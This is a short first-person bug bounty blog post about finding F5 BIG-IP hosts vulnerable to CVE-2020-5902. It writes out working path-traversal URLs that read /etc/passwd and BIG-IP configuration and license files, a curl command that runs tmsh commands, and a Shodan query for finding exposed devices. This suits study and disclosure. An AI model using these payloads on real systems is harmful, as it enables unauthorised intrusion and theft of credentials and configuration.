How I found 10 Remote Code Execution in 10 minutes CVE-2020–5902

Today I am going to talk about F5 BIG-IP vulnerability which was discovered recently. On 4th of July I saw this tweet on Twitter.

But I didn’t found any POC of this zero day. So as a noob bug bounty hunter I just ignored it and thought I won’t be able to exploit it :( .

So next day I woke up and saw the feeds on the Twitter. And I saw this meme

and after few minutes

and I was like

So I immediately started looking for a poc and I found couple of them

For Directory Traversal

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hostshttps://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.licensehttps://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.confhttps://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

For Remote Code Execution

curl -v -k  'https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

Now to find these domains vulnerable to F5 BIG-IP. I used these query on shodan.io

title:”BIG-IP&reg;- Redirect”

If you want to check whether your organization is vulnerable with this or not use this query

title:”BIG-IP&reg;- Redirect” org:<yourorgname>

when I searched for the query it turns out there were total 8.4k results!

So I looked for the org which was having a bug bounty program and I found there were total 10 domains which were vulnerable with this CVE. I made a POC and reported all of them. I was so happy at that time because I have never founded a RCE earlier and I was reporting it not 1 but 10! .

After 4 hours I checked my profile and all of my submission were duplicates.

I felt very bad for the few minutes because in Bug Bounty there is no room for the second person the researcher reported the bug a day before me.

But still all I know was that was an hell of an amazing ride the moment when I found those RCE’s with only a single command. :)

Takeaway -> Always try to update yourself on twitter because most of the info sec community is there.

By the time this blog will get published there will be many automated scanner available to find this CVE on Github so don’t forget to check them out.

It is my first blog so Thank you for reading :)

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store